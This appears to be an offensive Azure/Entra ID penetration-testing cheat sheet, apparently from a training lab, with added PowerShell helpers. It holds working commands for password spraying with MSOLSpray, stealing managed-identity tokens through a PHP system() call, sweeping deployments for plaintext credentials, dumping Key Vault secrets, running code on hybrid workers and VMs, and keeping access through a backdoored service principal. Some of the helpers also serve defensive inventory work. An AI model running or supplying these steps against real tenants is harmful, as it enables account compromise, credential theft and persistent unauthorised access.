I. Reconnaissance (external)
Useful tool: https://github.com/nyxgeek/o365recon
Find subdomains of the target
Using MicroBurst
. .\Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose
Validate email addresses (which ones exist in O365):
python o365creeper.py -f emails.txt -o validemails.txt
II. Reconnaissance (internal)
Using ROADtools (roadrecon)
roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui
Using StormSpotter
python ssbackend.pyz
quasar.cmd serve -p 9091 --history
Using BloodHound with AzureHound
. C:\AzAD\Tools\AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose
III. Initial attack
Password spraying
MSOLSpray.ps1
Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose
Illicit Consent Grant attack.
Using
IV. Lateral movement
Check the env command for IDENTITY_HEADER and IDENTITY_ENDPOINT (set when the App Service / Function App has a managed identity); dump a token for the ARM API with this code:
<?php
// Managed identity endpoint; api-version 2017-09-01 authenticates the caller with the "secret" header
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret: $IDENTITY_HEADER"');
?>
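The same token retrieval in PowerShell (usable from a Kudu console on a Windows App Service), plus a decoder for the JWT payload so you can see which tenant and identity the token represents before reusing it. This is an added example, not code from the original notes: the helper names (Get-MsiToken, ConvertFrom-Jwt, Show-TokenIdentity, New-SampleJwt) and the constructed sample token are mine; IDENTITY_ENDPOINT and IDENTITY_HEADER are the platform variables named above.

```powershell
# Added example: fetch a managed-identity token and inspect its claims.
# Get-MsiToken, ConvertFrom-Jwt, Show-TokenIdentity and New-SampleJwt are
# helper names chosen for this example, not platform or module cmdlets.

function Get-MsiToken {
    param(
        [string]$Resource = 'https://management.azure.com/',
        # Both variables are set by App Service when a managed identity is assigned.
        [string]$Endpoint = $env:IDENTITY_ENDPOINT,
        [string]$Secret   = $env:IDENTITY_HEADER
    )
    if (-not $Endpoint -or -not $Secret) { throw 'No managed identity endpoint in this environment' }
    $uri = '{0}?resource={1}&api-version=2017-09-01' -f $Endpoint, [uri]::EscapeDataString($Resource)
    # api-version 2017-09-01 authenticates the caller with the "secret" header
    (Invoke-RestMethod -Uri $uri -Method Get -Headers @{ secret = $Secret }).access_token
}

function ConvertFrom-Jwt {
    param([Parameter(Mandatory)][string]$Token)
    # The payload is the second dot-separated segment, base64url without padding
    $b64 = ($Token -split '\.')[1].Replace('-', '+').Replace('_', '/')
    switch ($b64.Length % 4) { 2 { $b64 += '==' } 3 { $b64 += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)) | ConvertFrom-Json
}

function Show-TokenIdentity {
    param([Parameter(Mandatory)][string]$Token)
    $c = ConvertFrom-Jwt -Token $Token
    [pscustomobject]@{
        Tenant     = $c.tid
        AppId      = $c.appid     # client id of the managed identity
        ObjectId   = $c.oid       # service principal object id (use with Get-AzRoleAssignment -ObjectId)
        Audience   = $c.aud
        ExpiresUtc = [DateTimeOffset]::FromUnixTimeSeconds([long]$c.exp).UtcDateTime
    }
}

# Constructed, unsigned sample token so the decoder can be tried offline;
# the claim values are placeholders, not a real identity.
function New-SampleJwt {
    $hdr = '{"alg":"none","typ":"JWT"}'
    $pl  = '{"aud":"https://management.azure.com/","tid":"00000000-0000-0000-0000-000000000001","appid":"11111111-1111-1111-1111-111111111111","oid":"22222222-2222-2222-2222-222222222222","exp":1700000000}'
    $enc = { param($s) [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($s)).TrimEnd('=').Replace('+', '-').Replace('/', '_') }
    '{0}.{1}.' -f (& $enc $hdr), (& $enc $pl)
}

Show-TokenIdentity -Token (New-SampleJwt)

# On a real App Service with a managed identity:
#   $tok = Get-MsiToken
#   Show-TokenIdentity -Token $tok
#   Connect-AzAccount -AccessToken $tok -AccountId (ConvertFrom-Jwt $tok).appid
```

Decode before you pivot: the oid claim is what Get-AzRoleAssignment needs to show what the identity can actually reach, and the exp claim tells you how long the stolen token stays usable (managed-identity tokens cannot be refreshed without the endpoint).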
Check deployments (parameters and outputs may contain credentials)
Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>
Save deployment template
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>
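Checking deployments one resource group at a time is slow; the following added example (not from the original notes) sweeps every resource group the current identity can read, reports parameters and outputs whose names look like credentials, and saves the template of each matching deployment with the same Save-AzResourceGroupDeploymentTemplate call shown above. Find-DeploymentSecrets, the output directory and the name pattern are choices made for this example.

```powershell
# Added example: sweep readable resource groups for deployment parameters/outputs
# that look like credentials, and keep the template of any deployment that matches.
# Find-DeploymentSecrets is a name chosen here.

function Find-DeploymentSecrets {
    param(
        [string]$OutDir  = (Join-Path (Get-Location) 'deployment-templates'),
        # Name heuristic. Values of type SecureString are not returned by ARM, so
        # the interesting cases are plain String parameters/outputs with such names.
        [string]$Pattern = 'password|passwd|secret|key|token|connectionstring|sas'
    )
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    foreach ($rg in Get-AzResourceGroup) {
        foreach ($dep in Get-AzResourceGroupDeployment -ResourceGroupName $rg.ResourceGroupName) {
            # Parameters and Outputs are dictionaries of name -> DeploymentVariable (Type, Value)
            $entries = @()
            if ($dep.Parameters) { $entries += @($dep.Parameters.GetEnumerator()) }
            if ($dep.Outputs)    { $entries += @($dep.Outputs.GetEnumerator()) }
            $hits = foreach ($e in $entries) {
                if ($e.Key -match $Pattern -and $e.Value.Type -ne 'SecureString') {
                    [pscustomobject]@{
                        ResourceGroup = $rg.ResourceGroupName
                        Deployment    = $dep.DeploymentName
                        Name          = $e.Key
                        Type          = $e.Value.Type
                        Value         = $e.Value.Value
                    }
                }
            }
            if ($hits) {
                $file = Join-Path $OutDir ('{0}-{1}.json' -f $rg.ResourceGroupName, $dep.DeploymentName)
                # Save the template too: hard-coded values and nested templates live there
                Save-AzResourceGroupDeploymentTemplate -ResourceGroupName $rg.ResourceGroupName `
                    -DeploymentName $dep.DeploymentName -Path $file -Force | Out-Null
                $hits
            }
        }
    }
}

Find-DeploymentSecrets | Format-Table -AutoSize
```

The name filter only catches careless naming; still grep the saved templates, since secrets are just as often hard-coded in resource properties (connection strings in app settings, for example) rather than passed as parameters.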
VM interaction:
Access the VM using PSRemoting
$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess
Transfer a file:
Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ -Verbose
Execute a command:
Invoke-Command -Session $sess -ScriptBlock {ls C:\Users\}
Using Hybrid Runbook Workers (the runbook executes on the on-prem/VM worker, not in Azure)
List Automation Hybrid Worker Groups
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
Import, publish and start a runbook on a worker group:
Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose
Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Dump PRT
Use the PRT in Chrome
Abuse dynamic groups
Abuse application proxy
Check Azure AD Connect and its authentication type
Get-ADSyncConnector
Cloud to on-prem:
abuse PTA,
obtain PRT cookie
Read more: https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/
Global Administrator or Intune Administrator role can execute PowerShell scripts on an enrolled Windows device
On-prem to cloud:
abuse PHS
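For the "abuse dynamic groups" item above, the practical first step is finding which dynamic groups exist, which rules depend on attributes a user or guest can influence (otherMails is the classic one, since an invited guest's secondary mail is attacker-chosen), and whether any such group holds a directory role. The following is an added example, not from the original notes, built on the AzureAD module used elsewhere on this page; Get-RiskyDynamicGroups is a name chosen here and the attribute list is a heuristic, not a complete set.

```powershell
# Added example: list dynamic groups, flag rules that depend on attributes a
# user or guest can influence, and show which directory roles each group holds.
# Get-RiskyDynamicGroups is a name chosen here; the attribute list is a heuristic.

function Get-RiskyDynamicGroups {
    # Attributes that are self-service editable or populated from invite/guest data
    $userInfluenced = 'user\.(otherMails|mail|userPrincipalName|displayName|mobilePhone|jobTitle|department|employeeId)'
    # Map group object id -> activated directory roles assigned to the group
    $rolesByGroup = @{}
    foreach ($role in Get-AzureADDirectoryRole) {
        foreach ($m in Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId) {
            if ($m.ObjectType -eq 'Group') { $rolesByGroup[$m.ObjectId] += @($role.DisplayName) }
        }
    }
    Get-AzureADMSGroup -All $true |
        Where-Object { $_.GroupTypes -contains 'DynamicMembership' } |
        ForEach-Object {
            [pscustomobject]@{
                DisplayName    = $_.DisplayName
                ObjectId       = $_.Id
                Rule           = $_.MembershipRule
                State          = $_.MembershipRuleProcessingState   # 'On' means the rule is live
                UserInfluenced = [bool]($_.MembershipRule -match $userInfluenced)
                DirectoryRoles = ($rolesByGroup[$_.Id] -join ', ')
            }
        }
}

Get-RiskyDynamicGroups | Sort-Object UserInfluenced -Descending | Format-List
```

Read the flagged rules by hand: a rule such as (user.otherMails -any (_ -contains "vendor")) is only exploitable if you can set that attribute on a principal you control, so check whether guest invitations or self-service profile edits are allowed before counting it as a path.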
V. Persistence
Add a new application (service principal) with high permissions and a credential you control, then authenticate as it for persistence
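The flip side of the persistence note above is spotting such an application: one that carries a password or certificate credential, especially one added recently, and whose owners can add further credentials. This added example (not from the original notes; Get-AppCredentialInventory and the RecentDays threshold are choices made here) inventories application credentials with the AzureAD module used elsewhere on this page.

```powershell
# Added example: inventory applications that carry a usable credential, with
# the credential's dates and the app's owners, so a freshly added backdoor app
# (or an existing one worth hijacking) stands out. Get-AppCredentialInventory
# and the RecentDays threshold are choices made for this example.

function Get-AppCredentialInventory {
    param([int]$RecentDays = 30)
    $cutoff = (Get-Date).AddDays(-$RecentDays)
    foreach ($app in Get-AzureADApplication -All $true) {
        $creds = @()
        foreach ($p in Get-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId) {
            $creds += [pscustomobject]@{ Kind = 'Password'; KeyId = $p.KeyId; Start = $p.StartDate; End = $p.EndDate }
        }
        foreach ($k in Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId) {
            $creds += [pscustomobject]@{ Kind = "Key/$($k.Usage)"; KeyId = $k.KeyId; Start = $k.StartDate; End = $k.EndDate }
        }
        if ($creds.Count -eq 0) { continue }
        # Owners can add their own credential to the app, so they matter as much as role holders
        $owners = foreach ($o in Get-AzureADApplicationOwner -ObjectId $app.ObjectId) {
            if ($o.UserPrincipalName) { $o.UserPrincipalName } else { $o.DisplayName }
        }
        foreach ($c in $creds) {
            [pscustomobject]@{
                App    = $app.DisplayName
                AppId  = $app.AppId
                Kind   = $c.Kind
                KeyId  = $c.KeyId
                Start  = $c.Start
                End    = $c.End
                Recent = ($c.Start -gt $cutoff)   # added within the last $RecentDays days
                Owners = ($owners -join ', ')
            }
        }
    }
}

Get-AppCredentialInventory | Where-Object Recent | Format-Table -AutoSize
```

Feed the AppId of anything interesting into the Get-AzureADServicePrincipal lookup and the Global Administrator listing further down in these notes to see what the application is actually allowed to do; a credential on an app whose service principal holds no role and no application permission is noise.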
Useful commands:
Login:
az login -u test@test.onmicrosoft.com -p testpassword
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds
AzureHound (PowerShell collector)
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
.\AzureHound.ps1
Invoke-AzureHound -Verbose
Get all users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName (only UPNs)
Show Global Administrators
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
List all custom directory roles:
Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.com",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName
List resources (Azure RM, not Azure AD)
Get-AzResource
Get all the role assignments for the test user
Get-AzRoleAssignment -SignInName test@test.onmicrosoft.com
Get-AzRoleAssignment -Scope <Scope>
Check the definition of this role
Get-AzRoleDefinition -Name <Role_name>
List all the VMs where the current user has at least the Reader role
Get-AzVM | fl
or
az vm list
List all App Services. Filter on 'Kind', otherwise both App Services and Function Apps are listed
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list (list App Services)
az webapp list --query "[].[name]" -o table (list only the names of App Services)
To list Function Apps
Get-AzFunctionApp
list storage accounts
Get-AzStorageAccount | fl
az storage account list
List key vaults readable by the current user
Get-AzKeyVault
az keyvault list
Get-AzKeyVaultSecret -VaultName <VaultName> (list secrets)
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Secret_name> -AsPlainText
Check if a user is logged in to az cli on that machine
az ad signed-in-user show
Check if there is a public IP address attached to the VM
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | select -ExpandProperty NetworkProfile
Get more details about the network interface attached to the VM using the below command
Get-AzNetworkInterface -Name <VM_interface>
Get the public IP address attached to the VM
Get-AzPublicIpAddress -Name <IP_name>
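The three commands above are one chain (VM -> NIC -> public IP) that is tedious to follow by copying names. This added example (not from the original notes) walks the resource IDs instead; Get-VmPublicIp is a name chosen here, and the VM and resource group names in the final call are placeholders.

```powershell
# Added example: walk VM -> NIC -> public IP by following the resource IDs
# instead of copying names by hand; also reports the NIC-level NSG. Get-VmPublicIp
# is a name chosen here, and the names in the call at the bottom are placeholders.

function Get-VmPublicIp {
    param(
        [Parameter(Mandatory)][string]$VMName,
        [Parameter(Mandatory)][string]$ResourceGroupName
    )
    $vm = Get-AzVM -Name $VMName -ResourceGroupName $ResourceGroupName
    foreach ($nicRef in $vm.NetworkProfile.NetworkInterfaces) {
        $nic = Get-AzNetworkInterface -ResourceId $nicRef.Id
        # NSG attached to the NIC; subnet-level NSGs are not covered here
        $nsg = if ($nic.NetworkSecurityGroup) { ($nic.NetworkSecurityGroup.Id -split '/')[-1] } else { $null }
        foreach ($cfg in $nic.IpConfigurations) {
            $pip = $null
            if ($cfg.PublicIpAddress.Id) {
                # Id looks like /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Network/publicIPAddresses/<name>
                $parts = $cfg.PublicIpAddress.Id -split '/'
                $pip = Get-AzPublicIpAddress -Name $parts[-1] -ResourceGroupName $parts[4]
            }
            [pscustomobject]@{
                VM        = $vm.Name
                Nic       = $nic.Name
                PrivateIp = $cfg.PrivateIpAddress
                PublicIp  = $pip.IpAddress        # $null when no public IP is attached
                Fqdn      = $pip.DnsSettings.Fqdn
                NicNsg    = $nsg
            }
        }
    }
}

Get-VmPublicIp -VMName 'vm01' -ResourceGroupName 'rg01'   # placeholder names
```

A VM with no public IP may still be reachable through a load balancer or Bastion, so an empty PublicIp column rules out only the direct path.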
Get AzVM
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *
Get information about a group
Get-AzADGroup -DisplayName <Group_name>
Enumerate the service principals in Azure AD and find the one that AppId xx belongs to
Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl
Disconnect
Disconnect-AzAccount
Check if any extensions are already installed
Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>
Run a PowerShell script file on the VM
Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose